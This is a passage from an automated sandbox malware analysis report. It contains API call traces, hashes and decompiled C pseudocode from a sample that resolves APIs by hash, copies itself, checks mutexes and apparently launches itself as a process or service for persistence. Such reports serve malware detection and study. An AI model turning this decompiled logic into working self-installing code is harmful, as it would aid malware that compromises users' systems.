CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0138A4A9
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0138A4C5
CloseHandle.KERNEL32(00000000), ref: 0138A4CC
_snwprintf.NTDLL ref: 0138A501
GetProcessHeap.KERNEL32(00000000,?), ref: 0138A50D
HeapFree.KERNEL32(00000000), ref: 0138A514
CloseHandle.KERNEL32(?), ref: 0138A536
CloseHandle.KERNEL32(?), ref: 0138A53F
GetTickCount.KERNEL32 ref: 0138A56B
_snwprintf.NTDLL ref: 0138A5BE
GetProcessHeap.KERNEL32(00000000,?), ref: 0138A5CA
HeapFree.KERNEL32(00000000), ref: 0138A5D1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0138A5F0
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0138A608
CloseHandle.KERNEL32(00000000), ref: 0138A60F
memset.NTDLL ref: 0138A61D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0138A64A
CloseHandle.KERNEL32(?), ref: 0138A657
CloseHandle.KERNEL32(?), ref: 0138A660
GetProcessHeap.KERNEL32(00000000,?), ref: 0138A669
HeapFree.KERNEL32(00000000), ref: 0138A670

Strings

D, xrefs: 0138A626

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandle$Process$FileFree$Create_snwprintf$CountTickWrite$ActiveConsoleSessionmemset
String ID: D
API String ID: 65010116-2746444292
Opcode ID: 2ca1df39a19431a35e395994c7911ae9b22da2d77f4245abe2f2cc59cd5d22c0
Instruction ID: c7faa241a68115d6a8db546c9924d9f469c063f1e8fa97e3a52311cf96eb7a9b
Opcode Fuzzy Hash: 2ca1df39a19431a35e395994c7911ae9b22da2d77f4245abe2f2cc59cd5d22c0
Instruction Fuzzy Hash: 82813C75940309BFEB20ABA4DC89FEE7B7CFB08755F044151FA09E61C5DB70AA458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01389320, Relevance: 39.2, APIs: 26, Instructions: 246
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E01389320(void* __ecx) {
				void* _v8;
				long _v12;
				short _v44;
				intOrPtr _t25;
				void* _t27;
				void* _t28;
				signed int _t32;
				char* _t35;
				int _t53;
				signed int _t60;
				void* _t71;
				long _t72;
				void* _t74;
				void* _t75;
				signed int _t76;
				char _t77;
				void* _t79;
				signed short* _t80;
				long _t87;
				void* _t92;
				void* _t94;
				short* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t75 = __ecx;
				_t25 =  *0x138c27c; // 0x0
				_t103 = _t102 - 0x28;
				 *0x138c3ac = _t25;
				GetModuleFileNameW(0, 0x138c9c8, 0x104);
				_t27 =  *0x138c040(0, 0, 6);
				if(_t27 != 0) {
					 *0x138c2a4 =  *0x138c2a4 | 0x00000001;
					 *0x138c0a8(_t27);
				}
				_t28 =  *0x138c3ac; // 0x0
				_t96 = 0x138c3b0;
				_v8 = _t28;
				_t92 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
				if(_t92 == 0) {
					_t92 = _v12;
				} else {
					_push(_t75);
					E01381790(0x13813d0, 0x158, _t92);
					_t103 = _t103 + 8;
				}
				_t76 =  *0x138c1e4(_t92, _t71);
				_t72 = 2;
				_v12 = _t76;
				do {
					_t32 = _v8;
					_v8 =  !(_t32 / _t76);
					_t35 = _t92 + _t32 % _t76;
					if(_t35 <= _t92) {
						L9:
						if( *_t35 != 0x2c) {
							L11:
							_t77 =  *_t35;
							if(_t77 == 0) {
								goto L15;
							}
							while(_t77 != 0x2c) {
								_t35 = _t35 + 1;
								 *_t96 = _t77;
								_t96 = _t96 + 2;
								_t77 =  *_t35;
								if(_t77 != 0) {
									continue;
								}
								goto L15;
							}
							goto L15;
						}
						L10:
						_t35 = _t35 + 1;
						goto L11;
					}
					while( *_t35 != 0x2c) {
						_t35 = _t35 - 1;
						if(_t35 > _t92) {
							continue;
						}
						goto L9;
					}
					goto L10;
					L15:
					_t76 = _v12;
					_t72 = _t72 - 1;
				} while (_t72 != 0);
				HeapFree(GetProcessHeap(), 0, _t92);
				 *_t96 = 0;
				E01381830(0x1381384, 0xc, 0x7d1cc189,  &_v12);
				_t104 = _t103 + 8;
				_push(0x138c5b8);
				_push(0);
				_push(0);
				if(( *0x138c2a4 & 0x00000001) == 0) {
					 *0x138c214(0, 0x1c);
					_t87 = 0x14;
					_t79 = 0x1381530;
				} else {
					 *0x138c214(0, 0x29);
					_t87 = 4;
					_t79 = 0x1381380;
				}
				E01381830(_t79, _t87, 0x7d1cc189,  &_v8);
				_t97 = _v8;
				 *0x138c200(0x138c5b8, 0x104, _t97, 0x138c5b8, 0x138c3b0);
				HeapFree(GetProcessHeap(), 0, _t97);
				_t98 = _v12;
				 *0x138c200(0x138c7c0, 0x104, _t98, 0x138c5b8, 0x138c3b0);
				_t106 = _t104 + 0x30;
				HeapFree(GetProcessHeap(), 0, _t98);
				_t99 = CreateFileW(0x138c9c8, 0x80000000, 1, 0, 3, 0, 0);
				if(_t99 != 0xffffffff) {
					_t94 = CreateFileMappingW(_t99, 0, 2, 0, 0, 0);
					if(_t94 != 0) {
						_t74 = MapViewOfFile(_t94, 4, 0, 0, 0);
						if(_t74 != 0) {
							 *0x138cbd0 = RtlComputeCrc32(0, _t74, GetFileSize(_t99, 0));
							UnmapViewOfFile(_t74);
						}
						CloseHandle(_t94);
					}
					CloseHandle(_t99);
				}
				_v12 = 0x10;
				_t53 = GetComputerNameW( &_v44,  &_v12);
				if(_t53 == 0) {
					L40:
					return _t53;
				} else {
					_t80 =  &_v44;
					if(_v44 == 0) {
						L36:
						_t101 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
						if(_t101 == 0) {
							_t101 = _v12;
						} else {
							_push(_t80);
							E01381790(0x1381390, 8, _t101);
							_t106 = _t106 + 8;
						}
						 *0x138c210(0x138c2a8, 0x104, _t101,  &_v44,  *0x138c3ac);
						_t53 = HeapFree(GetProcessHeap(), 0, _t101);
						goto L40;
					}
					do {
						_t60 =  *_t80 & 0x0000ffff;
						if(_t60 < 0x30 || _t60 > 0x39) {
							if(_t60 < 0x61 || _t60 > 0x7a) {
								if(_t60 < 0x41 || _t60 > 0x5a) {
									 *_t80 = 0x58;
								}
							}
						}
						_t80 =  &(_t80[1]);
					} while ( *_t80 != 0);
					goto L36;
				}
			}

0x01389320
0x01389323
0x01389328
0x0138932b
0x0138933c
0x01389348
0x01389350
0x01389352
0x0138935a
0x0138935a
0x01389360
0x0138936e
0x01389373
0x01389383
0x01389387
0x0138939f
0x01389389
0x01389389
0x01389395
0x0138939a
0x0138939a
0x013893aa
0x013893ac
0x013893b1
0x013893b4
0x013893b4
0x013893bd
0x013893c0
0x013893c5
0x013893d1
0x013893d4
0x013893d7
0x013893d7
0x013893db
0x00000000
0x00000000
0x013893e0
0x013893e9
0x013893ea
0x013893ed
0x013893f0
0x013893f4
0x00000000
0x00000000
0x00000000
0x013893f4
0x00000000
0x013893e0
0x013893d6
0x013893d6
0x00000000
0x013893d6
0x013893c7
0x013893cc
0x013893cf
0x00000000
0x00000000
0x00000000
0x013893cf
0x00000000
0x013893f6
0x013893f6
0x013893f9
0x013893f9
0x01389406
0x01389413
0x01389424
0x01389429
0x01389433
0x01389438
0x0138943a
0x0138943c
0x01389458
0x0138945e
0x01389463
0x0138943e
0x01389442
0x01389448
0x0138944d
0x0138944d
0x01389471
0x01389476
0x0138948e
0x013894a1
0x013894a7
0x013894bf
0x013894c5
0x013894d2
0x013894f2
0x013894f7
0x0138950a
0x0138950e
0x0138951f
0x01389523
0x01389539
0x0138953e
0x0138953e
0x01389545
0x01389545
0x0138954c
0x0138954c
0x01389555
0x01389561
0x0138956a
0x0138960b
0x01389610
0x01389570
0x01389575
0x01389578
0x013895ad
0x013895be
0x013895c2
0x013895da
0x013895c4
0x013895c4
0x013895d0
0x013895d5
0x013895d5
0x013895f2
0x01389605
0x00000000
0x01389605
0x01389580
0x01389580
0x01389586
0x01389590
0x0138959a
0x013895a1
0x013895a1
0x0138959a
0x01389590
0x013895a4
0x013895a7
0x00000000
0x01389580

APIs

GetModuleFileNameW.KERNEL32(00000000,0138C9C8,00000104,?,?,?,?,?,?,?,?,?,01389310), ref: 0138933C
GetProcessHeap.KERNEL32(00000008,0000015C,00000000,013816C0,?,?,?,?,?,?,?,?,?,01389310), ref: 01389376
RtlAllocateHeap.NTDLL(00000000), ref: 0138937D
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01389310), ref: 013893A4
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,01389310), ref: 013893FF
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,01389310), ref: 01389406
_snwprintf.NTDLL ref: 0138948E
GetProcessHeap.KERNEL32(00000000,01389310), ref: 0138949A
HeapFree.KERNEL32(00000000), ref: 013894A1
_snwprintf.NTDLL ref: 013894BF
GetProcessHeap.KERNEL32(00000000,?), ref: 013894CB
HeapFree.KERNEL32(00000000), ref: 013894D2
CreateFileW.KERNEL32(0138C9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 013894EC
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 01389504
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 01389519
GetFileSize.KERNEL32(00000000,00000000), ref: 01389528
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 01389532
UnmapViewOfFile.KERNEL32(00000000), ref: 0138953E
CloseHandle.KERNEL32(00000000), ref: 01389545
CloseHandle.KERNEL32(00000000), ref: 0138954C
GetComputerNameW.KERNEL32(?,?), ref: 01389561
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 013895B1
RtlAllocateHeap.NTDLL(00000000), ref: 013895B8
_snprintf.NTDLL ref: 013895F2
GetProcessHeap.KERNEL32(00000000,00000010), ref: 013895FE
HeapFree.KERNEL32(00000000), ref: 01389605

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$Free$AllocateCloseCreateHandleNameView_snwprintf$ComputeComputerCrc32MappingModuleSizeUnmap_snprintflstrlen
String ID:
API String ID: 968319538-0
Opcode ID: 94b3d4a7519a7cd726e34cb1e52bbb59deeea15c8edb704930b8aff32887cf65
Instruction ID: 4ddc59f0e7edc307da02b9f6f769eace4e23243f5ae91a23760071be74b7ae94
Opcode Fuzzy Hash: 94b3d4a7519a7cd726e34cb1e52bbb59deeea15c8edb704930b8aff32887cf65
Instruction Fuzzy Hash: B981A071640304BFFB206BA9AC89FEE3B6CEB85B1DF242015F605EA2C4D7B489418775

Uniqueness

Uniqueness Score: -1.00%

Function 01389C50, Relevance: 36.2, APIs: 24, Instructions: 185
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E01389C50(void* __ecx) {
				void* _v8;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_push(__ecx);
				E01381830(0x138155c, 0xc, 0x4a604ebc,  &_v8);
				_t100 = _v8;
				E01381B10(LoadLibraryW(_t100), 0x1381040, 0x21, 0x54b7e774, 0x138c040);
				HeapFree(GetProcessHeap(), 0, _t100);
				E01381830(0x1381568, 0xc, 0x4a604ebc,  &_v8);
				_t101 = _v8;
				E01381B10(LoadLibraryW(_t101), 0x1381024, 1, 0x3c505b91, 0x138c0c8);
				HeapFree(GetProcessHeap(), 0, _t101);
				E01381830(0x1381574, 0xc, 0x4a604ebc,  &_v8);
				_t102 = _v8;
				E01381B10(LoadLibraryW(_t102), 0x1381028, 2, 0x10577008, 0x138c214);
				HeapFree(GetProcessHeap(), 0, _t102);
				E01381830(0x1381580, 0xc, 0x4a604ebc,  &_v8);
				_t103 = _v8;
				E01381B10(LoadLibraryW(_t103), 0x138100c, 1, 0x7194b56b, 0x138c0c4);
				HeapFree(GetProcessHeap(), 0, _t103);
				E01381830(0x1381550, 0xc, 0x4a604ebc,  &_v8);
				_t104 = _v8;
				E01381B10(LoadLibraryW(_t104), 0x13810c4, 1, 0x20edec96, 0x138c0cc);
				HeapFree(GetProcessHeap(), 0, _t104);
				E01381830(0x1381544, 0xc, 0x4a604ebc,  &_v8);
				_t105 = _v8;
				E01381B10(LoadLibraryW(_t105), 0x13810c8, 2, 0x620cb38e, 0x138c21c);
				HeapFree(GetProcessHeap(), 0, _t105);
				E01381830(0x1381598, 0xc, 0x4a604ebc,  &_v8);
				_t106 = _v8;
				E01381B10(LoadLibraryW(_t106), 0x1381220, 0xe, 0x5a7185ae, 0x138c230);
				HeapFree(GetProcessHeap(), 0, _t106);
				E01381830(0x138158c, 0xc, 0x4a604ebc,  &_v8);
				_t107 = _v8;
				E01381B10(LoadLibraryW(_t107), 0x1381214, 3, 0x73ee0ad8, 0x138c224);
				HeapFree(GetProcessHeap(), 0, _t107);
				return E013892A0(_t61);
			}

0x01389c53
0x01389c68
0x01389c6d
0x01389c8d
0x01389c9f
0x01389cb8
0x01389cbd
0x01389cdd
0x01389cef
0x01389d08
0x01389d0d
0x01389d2d
0x01389d3f
0x01389d58
0x01389d5d
0x01389d7d
0x01389d8f
0x01389da8
0x01389dad
0x01389dcd
0x01389ddf
0x01389df8
0x01389dfd
0x01389e1d
0x01389e2f
0x01389e48
0x01389e4d
0x01389e6d
0x01389e7f
0x01389e98
0x01389ea0
0x01389ebd
0x01389ecf
0x01389ede

APIs

Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B

LoadLibraryW.KERNEL32(013816C0,?,013816C0), ref: 01389C74
GetProcessHeap.KERNEL32(00000000,013816C0,?,?,?,?,013816C0), ref: 01389C98
HeapFree.KERNEL32(00000000,?,?,?,?,013816C0), ref: 01389C9F
LoadLibraryW.KERNEL32(013816C0,?,?,?,?,?,?,013816C0), ref: 01389CC4
GetProcessHeap.KERNEL32(00000000,013816C0,?,?,?,?,?,?,?,?,?,013816C0), ref: 01389CE8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,013816C0), ref: 01389CEF
LoadLibraryW.KERNEL32(013816C0,?,?,?,?,?,?,?,?,?,?,?,013816C0), ref: 01389D14
GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389D38
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013816C0), ref: 01389D3F
LoadLibraryW.KERNEL32(013816C0), ref: 01389D64
GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389D88
HeapFree.KERNEL32(00000000), ref: 01389D8F
LoadLibraryW.KERNEL32(013816C0), ref: 01389DB4
GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389DD8
HeapFree.KERNEL32(00000000), ref: 01389DDF
LoadLibraryW.KERNEL32(013816C0), ref: 01389E04
GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389E28
HeapFree.KERNEL32(00000000), ref: 01389E2F
LoadLibraryW.KERNEL32(013816C0), ref: 01389E54
GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389E78
HeapFree.KERNEL32(00000000), ref: 01389E7F
LoadLibraryW.KERNEL32(013816C0), ref: 01389EA4
GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389EC8
HeapFree.KERNEL32(00000000), ref: 01389ECF

Part of subcall function 013892A0: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 013892B5

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeLibraryLoad$AllocateDirectoryWindows
String ID:
API String ID: 357832750-0
Opcode ID: e51e36d1ec1f80e34130864f71d6db9c1b3b6c569e85710e5c42d616f42d4709
Instruction ID: 4ff2710d872ebe2a71269100d296f505bad973408c5c583e793d95d56a2ea3a4
Opcode Fuzzy Hash: e51e36d1ec1f80e34130864f71d6db9c1b3b6c569e85710e5c42d616f42d4709
Instruction Fuzzy Hash: E551B275A40304BFEE2077E4AC5AFDF3A6CEB9130AF140014F906A7289DA315E068BB5

Uniqueness

Uniqueness Score: -1.00%

Function 01389060, Relevance: 34.7, APIs: 23, Instructions: 160
memorysynchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E01389060(void* __eflags) {
				void* _v8;
				char _v12;
				short _v140;
				short _v268;
				short _v396;
				long _t31;
				void* _t45;
				void* _t47;
				long _t50;
				long _t57;
				int _t59;
				signed int _t60;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t59 = 0;
				memset(0x138c284, 0, 0x18);
				_t60 = 0x1381364;
				_t2 = _t59 + 0xc; // 0xc
				E01381830(0x1381364, _t2, 0x4a604ebc,  &_v8);
				_t67 = _v8;
				 *0x138c200( &_v140, 0x40, _t67,  *0x138c27c);
				HeapFree(GetProcessHeap(), 0, _t67);
				_t66 = CreateMutexW(0, 0,  &_v140);
				if(_t66 == 0) {
					L12:
					 *0x138c0b8( *0x138c288);
					 *0x138c064( *0x138c28c);
					 *0x138c064( *0x138c290);
					 *0x138c08c( *0x138c284, 0);
					E01388AA0();
					return E0138A750(_t60 | 0xffffffff);
				}
				_t31 = WaitForSingleObject(_t66, 0);
				if(_t31 == 0 || _t31 == 0x80) {
					E01381830(0x1381258, 0xc, 0x4a604ebc,  &_v8);
					_t68 = _v8;
					 *0x138c200( &_v396, 0x40, _t68,  *0x138c27c);
					HeapFree(GetProcessHeap(), 0, _t68);
					_t60 = 0x1381264;
					E01381830(0x1381264, 0xc, 0x4a604ebc,  &_v8);
					_t69 = _v8;
					 *0x138c200( &_v268, 0x40, _t69,  *0x138c27c);
					HeapFree(GetProcessHeap(), 0, _t69);
					_t45 = CreateMutexW(0, 0,  &_v268);
					 *0x138c2a0 = _t45;
					if(_t45 == 0) {
						goto L12;
					}
					_t47 = CreateEventW(0, 0, 0,  &_v396);
					 *0x138c29c = _t47;
					if(_t47 != 0) {
						_t57 = SignalObjectAndWait(_t47,  *0x138c2a0, 0xffffffff, 0);
						if(_t57 == 0 || _t57 == 0x80) {
							_t59 = ResetEvent( *0x138c29c);
						}
					}
					ReleaseMutex(_t66);
					CloseHandle(_t66);
					if(_t59 != 0) {
						_t50 = GetTickCount();
						_push(0x10);
						_push(0x3e8);
						_push(0x3e8);
						_push(0);
						 *0x138c280 = 1;
						_push(E01388DD0);
						 *0x138c278 = _t50 + 0x3e8;
						_push(0);
						_push( &_v12);
						if( *0x138c0ec() != 0) {
							WaitForSingleObject( *0x138c29c, 0xffffffff);
							 *0x138c138(0, _v12, 0xffffffff);
						}
						CloseHandle( *0x138c29c);
					}
				}
			}

0x0138906e
0x01389076
0x0138907f
0x0138908a
0x0138908d
0x01389098
0x013890a5
0x013890b7
0x013890cc
0x013890d0
0x0138924f
0x01389255
0x01389261
0x0138926d
0x0138927b
0x01389281
0x01389294
0x01389294
0x013890d8
0x013890e0
0x01389100
0x0138910b
0x01389118
0x0138912b
0x0138913f
0x01389144
0x0138914f
0x0138915c
0x0138916f
0x01389180
0x01389186
0x0138918d
0x00000000
0x00000000
0x013891a0
0x013891a6
0x013891ad
0x013891ba
0x013891c2
0x013891d7
0x013891d7
0x013891c2
0x013891da
0x013891e1
0x013891e9
0x013891eb
0x013891f1
0x013891f3
0x013891f8
0x013891fd
0x01389204
0x0138920e
0x01389213
0x0138921b
0x0138921d
0x01389226
0x01389230
0x0138923d
0x0138923d
0x01389249
0x01389249
0x013891e9

APIs

memset.NTDLL ref: 01389076

Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B

_snwprintf.NTDLL ref: 013890A5
GetProcessHeap.KERNEL32(00000000,01389315), ref: 013890B0
HeapFree.KERNEL32(00000000), ref: 013890B7
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 013890C6
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 013890D8
_snwprintf.NTDLL ref: 01389118
GetProcessHeap.KERNEL32(00000000,01389315), ref: 01389124
HeapFree.KERNEL32(00000000), ref: 0138912B
_snwprintf.NTDLL ref: 0138915C
GetProcessHeap.KERNEL32(00000000,01389315), ref: 01389168
HeapFree.KERNEL32(00000000), ref: 0138916F
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 01389180
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 013891A0
SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 013891BA
ResetEvent.KERNEL32 ref: 013891D1
ReleaseMutex.KERNEL32(00000000), ref: 013891DA
CloseHandle.KERNEL32(00000000), ref: 013891E1
GetTickCount.KERNEL32 ref: 013891EB
CreateTimerQueueTimer.KERNEL32(?,00000000,01388DD0,00000000,000003E8,000003E8,00000010), ref: 0138921E
WaitForSingleObject.KERNEL32(000000FF), ref: 01389230
DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 0138923D
CloseHandle.KERNEL32 ref: 01389249

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$CreateProcessTimer$FreeMutexObjectWait_snwprintf$CloseEventHandleQueueSingle$AllocateCountDeleteReleaseResetSignalTickmemset
String ID:
API String ID: 3199319163-0
Opcode ID: 80f5351f5166917a96e2cf62d3da4db2f00c0eba9bd67252807e04c2dc5734e4
Instruction ID: f1a8b679c1f82030e265d0bd0f94bf99039e1ce1a092dc448a9ed22d0dbfc090
Opcode Fuzzy Hash: 80f5351f5166917a96e2cf62d3da4db2f00c0eba9bd67252807e04c2dc5734e4
Instruction Fuzzy Hash: AA513671500309AFEF206BE4EC89FEE7B6CEB45719F106165FA09E21D8DB709A448B70

Uniqueness

Uniqueness Score: -1.00%

Function 01389620, Relevance: 31.8, APIs: 21, Instructions: 284
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E01389620(void* __ecx, void* __edx) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				long _v46;
				struct _PROCESS_INFORMATION _v52;
				WCHAR* _v56;
				intOrPtr _v60;
				void _v64;
				void* _v68;
				struct _STARTUPINFOW _v140;
				short _v660;
				int _t56;
				void* _t64;
				long _t71;
				void* _t74;
				signed int _t103;
				long _t115;
				void* _t119;
				void* _t120;
				void* _t123;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				intOrPtr* _t129;

				_t56 = lstrcmpiW(0x138c9c8, 0x138c7c0);
				if(_t56 != 0) {
					E013818D0();
					memset( &_v660, 0, 0x208);
					memset( &_v64, 0, 0x1e);
					_v60 = 1;
					_v56 = 0x138c9c8;
					_v52.hThread = 0xe14;
					_v52.hProcess = 0x138c7c0;
					_t64 =  *0x138c218( &_v64);
					if(_t64 != 0 || _v46 != _t64) {
						GetTempPathW(0x104,  &_v660);
						GetTempFileNameW( &_v660, 0, 0,  &_v660);
						_v56 = 0x138c7c0;
						_v52.hProcess =  &_v660;
						_v46 = 0;
						_t71 =  *0x138c218( &_v64);
						if(_t71 != 0 || _v46 != _t71) {
							goto L35;
						} else {
							_v46 = _t71;
							_v56 = 0x138c9c8;
							_v52.hProcess = 0x138c7c0;
							_t74 =  *0x138c218( &_v64);
							if(_t74 != 0 || _v46 != _t74) {
								goto L35;
							} else {
								goto L8;
							}
						}
					} else {
						L8:
						E01381970();
						if(( *0x138c2a4 & 0x00000001) == 0) {
							memset( &_v140, 0, 0x44);
							_v140.cb = 0x44;
							_v140.dwFlags = 0x80;
							if(CreateProcessW(0x138c7c0, 0, 0, 0, 0, 0, 0, 0,  &_v140,  &_v52) != 0) {
								CloseHandle(_v52);
								CloseHandle(_v52.hThread);
							}
							goto L35;
						} else {
							_t125 =  *0x138c040(0, 0, 6);
							_v28 = _t125;
							if(_t125 == 0) {
								L35:
								return 1;
							} else {
								_t127 =  *0x138c0c0(_t125, 0x138c3b0, 0x138c3b0, 0x12, 0x10, 2, 0, 0x138c7c0, 0, 0, 0, 0, 0);
								_v24 = _t127;
								if(_t127 != 0) {
									_push(0);
									_push(0);
									_v12 = 0;
									_push( &_v32);
									_push( &_v20);
									_push(0);
									_push(0);
									_push(3);
									_push(0x30);
									_push(0);
									_push(_t125);
									if( *0x138c054() == 0 && GetLastError() == 0xea) {
										_t119 = RtlAllocateHeap(GetProcessHeap(), 8, _v20);
										_v68 = _t119;
										if(_t119 != 0) {
											_push(0);
											_push(0);
											_push( &_v32);
											_push( &_v20);
											_push(_v20);
											_push(_t119);
											_push(3);
											_push(0x30);
											_push(0);
											_push(_t125);
											if( *0x138c054() == 0) {
												_t120 = _v16;
											} else {
												_t103 =  *0x138c3ac; // 0x0
												_t123 = _v32 * 0x2c + _t119;
												_v16 = _t123;
												_t120 = _v16;
												_t129 =  <  ? (_t103 & 0x0000000f) * 0x2c + _t119 : _t119;
												while(_t129 < _t123) {
													_t126 =  *0x138c088(_t125,  *_t129, 1);
													if(_t126 != 0) {
														_push( &_v8);
														_push(0);
														_push(0);
														_push(1);
														_push(_t126);
														if( *0x138c0b0() == 0 && GetLastError() == 0x7a) {
															_t120 = RtlAllocateHeap(GetProcessHeap(), 8, _v8);
															if(_t120 != 0) {
																_t115 =  *0x138c0b0(_t126, 1, _t120, _v8,  &_v8);
																_v12 = _t115;
																if(_t115 == 0) {
																	HeapFree(GetProcessHeap(), _t115, _t120);
																}
															}
														}
														 *0x138c0a8(_t126);
													}
													_t125 = _v28;
													_t129 = _t129 + 0x2c;
													_t123 = _v16;
													if(_v12 == 0) {
														continue;
													}
													break;
												}
												_t127 = _v24;
											}
											HeapFree(GetProcessHeap(), 0, _v68);
											if(_v12 != 0) {
												 *0x138c090(_t127, 1, _t120);
												HeapFree(GetProcessHeap(), 0, _t120);
											}
										}
									}
								} else {
									_t127 =  *0x138c088(_t125, 0x138c3b0, 0x10);
								}
								if(_t127 != 0) {
									 *0x138c048(_t127, 0, 0);
									 *0x138c0a8(_t127);
								}
								 *0x138c0a8(_t125);
								return 1;
							}
						}
					}
				} else {
					return _t56;
				}
			}

0x01389636
0x0138963e
0x01389647
0x0138965a
0x0138966b
0x01389674
0x01389680
0x01389687
0x0138968e
0x01389696
0x0138969e
0x013896b5
0x013896c7
0x013896d3
0x013896da
0x013896e1
0x013896e8
0x013896f0
0x00000000
0x013896ff
0x013896ff
0x01389706
0x0138970d
0x01389714
0x0138971c
0x00000000
0x00000000
0x00000000
0x00000000
0x0138971c
0x0138972b
0x0138972b
0x0138972b
0x01389737
0x01389940
0x01389949
0x01389956
0x01389980
0x01389985
0x0138998e
0x0138998e
0x00000000
0x0138973d
0x01389749
0x0138974b
0x01389750
0x01389996
0x0138999f
0x01389756
0x0138977e
0x01389780
0x01389785
0x0138979c
0x0138979e
0x013897a3
0x013897aa
0x013897ae
0x013897af
0x013897b1
0x013897b3
0x013897b5
0x013897b7
0x013897b9
0x013897c2
0x013897eb
0x013897ed
0x013897f2
0x013897f8
0x013897fa
0x013897ff
0x01389803
0x01389804
0x01389807
0x01389808
0x0138980a
0x0138980c
0x0138980e
0x01389817
0x01389930
0x0138981d
0x0138981d
0x0138982e
0x01389832
0x01389835
